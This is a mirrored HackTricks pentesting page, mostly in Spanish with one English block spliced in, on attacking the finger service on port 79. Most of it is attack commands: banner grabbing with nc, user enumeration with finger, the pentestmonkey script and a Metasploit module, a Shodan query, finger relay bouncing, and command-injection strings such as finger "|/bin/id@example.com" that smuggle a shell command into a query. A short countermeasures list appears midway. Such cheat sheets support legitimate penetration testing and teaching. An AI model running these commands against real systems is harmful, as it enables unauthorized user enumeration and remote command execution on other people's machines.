hacktricks/network-services-pentesting/pentesting-finger.md at 4d93b96cef30e40f9f6a9c20aac387a6047dade9

mirror of https://github.com/carlospolop/hacktricks synced 2024-11-23 05:03:35 +00:00

carlospolop 63bd9641c0 f

2023-06-05 20:33:24 +02:00

4.1 KiB

Raw Blame History

Información Básica

Finger es un programa que se puede utilizar para encontrar información sobre los usuarios de una computadora. Por lo general, muestra el nombre de inicio de sesión, el nombre completo y posiblemente otros detalles sobre el usuario que se está consultando. Estos detalles pueden incluir la ubicación de la oficina y el número de teléfono (si se conocen), el tiempo de inicio de sesión, el tiempo de inactividad, el tiempo en que se leyó el correo por última vez y los archivos de plan y proyecto del usuario.

Puerto predeterminado: 79

PORT   STATE SERVICE
79/tcp open  finger

Enumeración

Obtención de banners/Conexión básica

nc -vn <IP> 79
echo "root" | nc -vn <IP> 79

Enumeración de usuarios

Finger

Finger is a service that allows users to retrieve information about other users on a remote system. It is usually enabled on Unix-based systems and can be accessed through the finger command.

Finger can be used to enumerate users on a system by querying for a specific user or by requesting a list of all users. The information returned by Finger can include the user's login name, full name, home directory, and other details.

To query for a specific user, use the following command:

finger <username>@<hostname>

To request a list of all users, use the following command:

finger @<hostname>

Countermeasures

Disable the Finger service if it is not needed.
Limit access to the Finger service to trusted users only.
Use a firewall to restrict access to the Finger service from external networks.

finger @<Victim>       #List users
finger admin@<Victim>  #Get info of user
finger user@<Victim>   #Get info of user

Alternativamente, se puede utilizar finger-user-enum de pentestmonkey. A continuación se muestran algunos ejemplos:

finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt

Nmap ejecuta un script para hacer uso de los scripts predeterminados

Metasploit utiliza más trucos que Nmap

use auxiliary/scanner/finger/finger_users

Shodan

port:79 USER

Ejecución de comandos

finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"

Rebote de Finger

Utilizar un sistema como relé de finger

finger user@host@victim
finger @internal@external

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

¿Trabajas en una empresa de ciberseguridad? ¿Quieres ver tu empresa anunciada en HackTricks? ¿O quieres tener acceso a la última versión de PEASS o descargar HackTricks en PDF? ¡Consulta los PLANES DE SUSCRIPCIÓN!
Descubre The PEASS Family, nuestra colección exclusiva de NFTs
Obtén la oficial PEASS & HackTricks swag
Únete al 💬 grupo de Discord o al grupo de telegram o sígueme en Twitter 🐦@carlospolopm.
Comparte tus trucos de hacking enviando PRs al repositorio de hacktricks y al repositorio de hacktricks-cloud.

4.1 KiB Raw Blame History